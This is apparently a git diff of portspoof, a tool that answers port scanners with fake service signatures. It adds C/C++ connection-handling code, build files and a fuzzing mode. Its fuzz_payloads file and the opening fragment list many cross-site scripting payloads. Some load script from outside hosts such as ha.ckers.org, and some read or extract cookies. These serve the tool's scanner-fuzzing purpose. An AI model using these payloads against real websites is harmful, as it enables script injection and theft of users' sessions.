<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
BIN
src/src/a.out
Executable file
BIN
src/src/a.out
Executable file
Binary file not shown.
20
src/src/a.out.dSYM/Contents/Info.plist
Normal file
20
src/src/a.out.dSYM/Contents/Info.plist
Normal file
@ -0,0 +1,20 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>CFBundleDevelopmentRegion</key>
|
||||
<string>English</string>
|
||||
<key>CFBundleIdentifier</key>
|
||||
<string>com.apple.xcode.dsym.a.out</string>
|
||||
<key>CFBundleInfoDictionaryVersion</key>
|
||||
<string>6.0</string>
|
||||
<key>CFBundlePackageType</key>
|
||||
<string>dSYM</string>
|
||||
<key>CFBundleSignature</key>
|
||||
<string>????</string>
|
||||
<key>CFBundleShortVersionString</key>
|
||||
<string>1.0</string>
|
||||
<key>CFBundleVersion</key>
|
||||
<string>1</string>
|
||||
</dict>
|
||||
</plist>
|
BIN
src/src/a.out.dSYM/Contents/Resources/DWARF/a.out
Normal file
BIN
src/src/a.out.dSYM/Contents/Resources/DWARF/a.out
Normal file
Binary file not shown.
116
src/src/config.h.in
Normal file
116
src/src/config.h.in
Normal file
@ -0,0 +1,116 @@
|
||||
/* src/config.h.in. Generated from configure.in by autoheader. */
|
||||
|
||||
/* Define to 1 if you have the <fcntl.h> header file. */
|
||||
#undef HAVE_FCNTL_H
|
||||
|
||||
/* Define to 1 if you have the `inet_ntoa' function. */
|
||||
#undef HAVE_INET_NTOA
|
||||
|
||||
/* Define to 1 if you have the <inttypes.h> header file. */
|
||||
#undef HAVE_INTTYPES_H
|
||||
|
||||
/* Define to 1 if you have the <limits.h> header file. */
|
||||
#undef HAVE_LIMITS_H
|
||||
|
||||
/* Define to 1 if your system has a GNU libc compatible `malloc' function, and
|
||||
to 0 otherwise. */
|
||||
#undef HAVE_MALLOC
|
||||
|
||||
/* Define to 1 if you have the <memory.h> header file. */
|
||||
#undef HAVE_MEMORY_H
|
||||
|
||||
/* Define to 1 if you have the `memset' function. */
|
||||
#undef HAVE_MEMSET
|
||||
|
||||
/* Define to 1 if you have the <netdb.h> header file. */
|
||||
#undef HAVE_NETDB_H
|
||||
|
||||
/* Define to 1 if you have the <netinet/in.h> header file. */
|
||||
#undef HAVE_NETINET_IN_H
|
||||
|
||||
/* Define to 1 if you have the `socket' function. */
|
||||
#undef HAVE_SOCKET
|
||||
|
||||
/* Define to 1 if you have the <stdint.h> header file. */
|
||||
#undef HAVE_STDINT_H
|
||||
|
||||
/* Define to 1 if you have the <stdlib.h> header file. */
|
||||
#undef HAVE_STDLIB_H
|
||||
|
||||
/* Define to 1 if you have the <strings.h> header file. */
|
||||
#undef HAVE_STRINGS_H
|
||||
|
||||
/* Define to 1 if you have the <string.h> header file. */
|
||||
#undef HAVE_STRING_H
|
||||
|
||||
/* Define to 1 if you have the <syslog.h> header file. */
|
||||
#undef HAVE_SYSLOG_H
|
||||
|
||||
/* Define to 1 if you have the <sys/ioctl.h> header file. */
|
||||
#undef HAVE_SYS_IOCTL_H
|
||||
|
||||
/* Define to 1 if you have the <sys/socket.h> header file. */
|
||||
#undef HAVE_SYS_SOCKET_H
|
||||
|
||||
/* Define to 1 if you have the <sys/stat.h> header file. */
|
||||
#undef HAVE_SYS_STAT_H
|
||||
|
||||
/* Define to 1 if you have the <sys/timeb.h> header file. */
|
||||
#undef HAVE_SYS_TIMEB_H
|
||||
|
||||
/* Define to 1 if you have the <sys/types.h> header file. */
|
||||
#undef HAVE_SYS_TYPES_H
|
||||
|
||||
/* Define to 1 if you have <sys/wait.h> that is POSIX.1 compatible. */
|
||||
#undef HAVE_SYS_WAIT_H
|
||||
|
||||
/* Define to 1 if you have the <unistd.h> header file. */
|
||||
#undef HAVE_UNISTD_H
|
||||
|
||||
/* This is a Linux system */
|
||||
#undef LINUX
|
||||
|
||||
/* Define to 1 if your C compiler doesn't accept -c and -o together. */
|
||||
#undef NO_MINUS_C_MINUS_O
|
||||
|
||||
/* This is an OpenBSD system */
|
||||
#undef OPENBSD
|
||||
|
||||
/* Name of package */
|
||||
#undef PACKAGE
|
||||
|
||||
/* Define to the address where bug reports for this package should be sent. */
|
||||
#undef PACKAGE_BUGREPORT
|
||||
|
||||
/* Define to the full name of this package. */
|
||||
#undef PACKAGE_NAME
|
||||
|
||||
/* Define to the full name and version of this package. */
|
||||
#undef PACKAGE_STRING
|
||||
|
||||
/* Define to the one symbol short name of this package. */
|
||||
#undef PACKAGE_TARNAME
|
||||
|
||||
/* Define to the version of this package. */
|
||||
#undef PACKAGE_VERSION
|
||||
|
||||
/* This is a BSD system */
|
||||
#undef SOMEBSD
|
||||
|
||||
/* Define to 1 if you have the ANSI C header files. */
|
||||
#undef STDC_HEADERS
|
||||
|
||||
/* Version number of package */
|
||||
#undef VERSION
|
||||
|
||||
/* Use GNU source */
|
||||
#undef _GNU_SOURCE
|
||||
|
||||
/* Define to empty if `const' does not conform to ANSI C. */
|
||||
#undef const
|
||||
|
||||
/* Define to rpl_malloc if the replacement function should be used. */
|
||||
#undef malloc
|
||||
|
||||
/* Define to `unsigned int' if <sys/types.h> does not define. */
|
||||
#undef size_t
|
39
src/src/config_file.c
Normal file
39
src/src/config_file.c
Normal file
@ -0,0 +1,39 @@
|
||||
|
||||
|
||||
|
||||
char * get_substring_value(char* str)
|
||||
{
|
||||
int i=0;
|
||||
int soffset=-1,eoffset=-1;
|
||||
for(i;i<strlen(str);i++)
|
||||
{
|
||||
if(str[i]=='"')
|
||||
{
|
||||
|
||||
if(soffset==-1)
|
||||
soffset=i;
|
||||
else if(eoffset==-1)
|
||||
{
|
||||
eoffset=i;
|
||||
break;
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("Error in configuration file1");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if(soffset==-1 || eoffset==-1)
|
||||
{
|
||||
printf("Error in configuration file2");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
char *substr=malloc(eoffset-soffset);
|
||||
memset(substr,0,eoffset-soffset);
|
||||
memcpy(substr,str+soffset+1,eoffset-soffset-1);
|
||||
return substr;
|
||||
}
|
||||
|
6
src/src/config_file.h
Normal file
6
src/src/config_file.h
Normal file
@ -0,0 +1,6 @@
|
||||
|
||||
|
||||
|
||||
|
||||
int process_config_file(struct signature **arr_lines2,int* signatures,int num_lines, char* config_file);
|
||||
char *get_substring_value(char* str);
|
257
src/src/connection.cpp
Normal file
257
src/src/connection.cpp
Normal file
@ -0,0 +1,257 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include <pthread.h>
|
||||
#include <sys/param.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <time.h>
|
||||
#include "threads.h"
|
||||
#include "connection.h"
|
||||
#include "log.h"
|
||||
#include "Configuration.h"
|
||||
|
||||
Thread threads[MAX_THREADS];
|
||||
|
||||
|
||||
void nonblock(int sockfd)
|
||||
{
|
||||
int opts;
|
||||
opts = fcntl(sockfd, F_GETFL);
|
||||
if(opts < 0)
|
||||
{
|
||||
perror("fcntl(F_GETFL)\n");
|
||||
exit(1);
|
||||
}
|
||||
opts = (opts | O_NONBLOCK);
|
||||
if(fcntl(sockfd, F_SETFL, opts) < 0)
|
||||
{
|
||||
perror("fcntl(F_SETFL)\n");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
void* process_connection(void *arg)
|
||||
{
|
||||
int tid = *((int*)(&arg));
|
||||
//int len;
|
||||
string str;
|
||||
char buffer;
|
||||
int original_port=DEFAULT_PORT;
|
||||
int n = 0;
|
||||
time_t timestamp;
|
||||
struct sockaddr_in peer_sockaddr;
|
||||
int peer_sockaddr_len=sizeof(struct sockaddr_in);
|
||||
char* msg;
|
||||
|
||||
while(1) {
|
||||
|
||||
sleep(1);
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
|
||||
if(threads[tid].clients[i] != 0)
|
||||
{
|
||||
|
||||
timestamp = time(NULL);
|
||||
|
||||
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
|
||||
n = 1; // just reply...
|
||||
else
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
|
||||
|
||||
// deal with different recv buffer size
|
||||
if(n == 0){
|
||||
|
||||
#ifdef OSX
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
#else
|
||||
|
||||
if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) (socklen_t*) &peer_sockaddr_len )){
|
||||
perror("Getsockopt failed");
|
||||
goto close_socket;
|
||||
}
|
||||
else
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
|
||||
#endif
|
||||
|
||||
//LOG
|
||||
msg=(char*)malloc(MAX_LOG_MSG_LEN);
|
||||
memset(msg,0,MAX_LOG_MSG_LEN);
|
||||
snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
|
||||
log_write(msg);
|
||||
free(msg);
|
||||
//
|
||||
|
||||
close_socket:
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
fprintf(stdout,"Thread nr. %d : client %d closed connection\n",tid, threads[tid].clients[i]);
|
||||
|
||||
close(threads[tid].clients[i]);
|
||||
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
threads[tid].clients[i] = 0;
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
else if(n < 0){
|
||||
|
||||
|
||||
if(errno == EAGAIN)
|
||||
{
|
||||
continue; // Nmap NULL probe (no data) -> skip && go to another socket (client)
|
||||
}
|
||||
else if(errno == 104) // Client terminted connection -> get rid of the socket now!
|
||||
{}
|
||||
else
|
||||
fprintf(stdout,"errno: %d\n", errno);
|
||||
|
||||
#ifdef OSX
|
||||
|
||||
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
|
||||
#else
|
||||
|
||||
if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) &peer_sockaddr_len )){
|
||||
perror("Getsockopt failed");
|
||||
goto close_socket2;
|
||||
}
|
||||
else
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
|
||||
#endif
|
||||
|
||||
//LOG
|
||||
msg =(char*)malloc(MAX_LOG_MSG_LEN);
|
||||
memset(msg,0,MAX_LOG_MSG_LEN);
|
||||
snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
|
||||
log_write(msg);
|
||||
free(msg);
|
||||
//
|
||||
|
||||
close_socket2:
|
||||
close(threads[tid].clients[i]);
|
||||
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
threads[tid].clients[i] = 0;
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
|
||||
#ifdef OSX
|
||||
// BSD
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
//
|
||||
#else
|
||||
// Linux
|
||||
if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, (socklen_t*) &peer_sockaddr_len ))
|
||||
perror("Getsockopt failed");
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
//
|
||||
#endif
|
||||
|
||||
//LOG
|
||||
char* msg=(char*)malloc(MAX_LOG_MSG_LEN);
|
||||
memset(msg,0,MAX_LOG_MSG_LEN);
|
||||
snprintf(msg,MAX_LOG_MSG_LEN,"%d # Service_probe # SIGNATURE_SEND # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
|
||||
log_write(msg);
|
||||
free(msg);
|
||||
//
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
{
|
||||
fprintf(stdout,"\n---\nThread nr.%d for port %d \n", tid,original_port);
|
||||
}
|
||||
|
||||
std::vector<char> vectsignature=configuration->mapPort2Signature(original_port);
|
||||
|
||||
int buffertosendsize=vectsignature.size();
|
||||
char* buffertosend= (char*)malloc(buffertosendsize);
|
||||
|
||||
for(int j=0; j<buffertosendsize;j++)
|
||||
buffertosend[j]=vectsignature[j];
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
{
|
||||
|
||||
|
||||
fprintf(stdout,"signature sent -> ");
|
||||
for(int t=0;t<buffertosendsize;t++)
|
||||
{
|
||||
if(*(buffertosend+t)==0)
|
||||
fprintf(stdout,"\\00");
|
||||
else if(*(buffertosend+t)=='\n')
|
||||
fprintf(stdout,"\\n");
|
||||
else if(*(buffertosend+t)=='\r')
|
||||
fprintf(stdout,"\\r");
|
||||
else
|
||||
fprintf(stdout,"\\%x",*(buffertosend+t));
|
||||
}
|
||||
fprintf(stdout,"\n---\n");
|
||||
|
||||
}
|
||||
fflush(stdout);
|
||||
|
||||
|
||||
if(send(threads[tid].clients[i], buffertosend, buffertosendsize,0)==-1)
|
||||
perror("Send to socket failed");
|
||||
|
||||
close(threads[tid].clients[i]);
|
||||
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
threads[tid].clients[i] = 0;
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
else
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
}
|
||||
}
|
74
src/src/connection.h
Normal file
74
src/src/connection.h
Normal file
@ -0,0 +1,74 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
#include <pthread.h>
|
||||
#include "threads.h"
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <assert.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/stat.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/sysctl.h>
|
||||
#include <netdb.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
#include <err.h>
|
||||
#include <errno.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
|
||||
#include "revregex.h"
|
||||
#include "Configuration.h"
|
||||
|
||||
#define SO_ORIGINAL_DST 80
|
||||
#define TCPSTATES
|
||||
|
||||
|
||||
|
||||
extern Thread threads[MAX_THREADS];
|
||||
|
||||
class Configuration;
|
||||
extern Configuration* configuration;
|
||||
|
||||
void nonblock(int sockfd);
|
||||
void* process_connection(void *arg);
|
17
src/src/fuzz.txt
Normal file
17
src/src/fuzz.txt
Normal file
@ -0,0 +1,17 @@
|
||||
-> Reading fuzzing payloads from a file!
|
||||
Usage: portspoof [OPTION]...
|
||||
Portspoof - service signature obfuscator.
|
||||
|
||||
-i bind to a user defined IP address
|
||||
-p bind to a user defined PORT number
|
||||
-s custom signture file
|
||||
-c configuration file
|
||||
-l log port scanning alerts to a file
|
||||
-d disable syslog
|
||||
-v be verbose
|
||||
-f read fuzz payload list
|
||||
-1 generate fuzzing payloads
|
||||
-n nmap wrap fuzz signatures
|
||||
-h display this help and exit
|
||||
|
||||
Without any OPTION - use default values and continue
|
2
src/src/fuzz_nmap_signatures
Normal file
2
src/src/fuzz_nmap_signatures
Normal file
@ -0,0 +1,2 @@
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
550 4m2v4 (__FUZZ__)
|
304
src/src/fuzz_payloads
Normal file
304
src/src/fuzz_payloads
Normal file
@ -0,0 +1,304 @@
|
||||
WOOT
|
||||
A
|
||||
0AAAAAAAAAAAAAAAAAA
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG%20SRC="javascript:alert('XSS');">
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert("XSS")>
|
||||
<IMG%20SRC=`javascript:alert("RSnake%20says,%20'XSS'")`>
|
||||
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG%206;avascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC="jav ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav	ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="%20%20%20javascript:alert('XSS');">
|
||||
<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG%20SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT%20TYPE="IMAGE"%20SRC="javascript:alert('XSS');">
|
||||
<BODY%20BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY%20ONLOAD=alert('XSS')>
|
||||
<IMG%20DYNSRC="javascript:alert('XSS')">
|
||||
<IMG%20LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND%20SRC="javascript:alert('XSS');">
|
||||
<BR%20SIZE="&{alert('XSS')}">
|
||||
<LAYER%20SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK%20REL="stylesheet"%20HREF="javascript:alert('XSS');">
|
||||
<LINK%20REL="stylesheet"%20HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<http://ha.ckers.org/xss.css>;%20REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG%20SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG%20SRC="mocha:[code]">
|
||||
<IMG%20SRC="livescript:[code]">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<javascript:alert('XSS')>;%20REL=stylesheet">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;%20URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME%20SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE%20BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="width:%20expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG%20STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS%20STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS%20STYLE='no\xss:noxss("*//*");
|
||||
<STYLE%20TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A%20CLASS=XSS></A>
|
||||
<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE%20HREF="javascript:alert('XSS');//">
|
||||
<OBJECT%20TYPE="text/x-scriptlet"%20DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param%20name=url%20value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML%20ID=I><X><C><![CDATA[<IMG%20SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML%20SRC="http://ha.ckers.org/xsstest.xml"%20ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT%20SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec%20cmd="/bin/echo%20'<SCRIPT%20SRC'"--><!--#exec%20cmd="/bin/echo%20'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<?%20echo('<SCR)';
|
||||
<META%20HTTP-EQUIV="Set-Cookie"%20Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META%20HTTP-EQUIV="CONTENT-TYPE"%20CONTENT="text/html;%20charset=UTF-7">%20</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT%20a=">"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=">"%20''%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20"a='>'"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=`>`%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
'%20onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img%20src%3dx%20onerror%3dalert(1)>
|
||||
<script>%20document.getElementById(%22safe123%22).setCapture();%20document.getElementById(%22safe123%22).click();%20</script>
|
||||
<script>Object.defineProperties(window,%20{Safe:%20{value:%20{get:%20function()%20{return%20document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var%20x%20=%20document.createElement('iframe');document.body.appendChild(x);var%20xhr%20=%20x.contentWindow.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();</script>
|
||||
<script>(function()%20{var%20event%20=%20document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22,%20true,%20true,%20window,%200,%200,%200,%200,%200,%20false,%20false,%20false,%20false,%200,%20null);var%20fakeData%20=%20[event,%20{isTrusted:%20true},%20event];arguments.__defineGetter__('0',%20function()%20{%20return%20fakeData.pop();%20});alert(Safe.get.apply(null,%20arguments));})();</script>
|
||||
<script>var%20script%20=%20document.getElementsByTagName('script')[0];%20var%20clone%20=%20script.childNodes[0].cloneNode(true);%20var%20ta%20=%20document.createElement('textarea');%20ta.appendChild(clone);%20alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>xhr=new%20ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
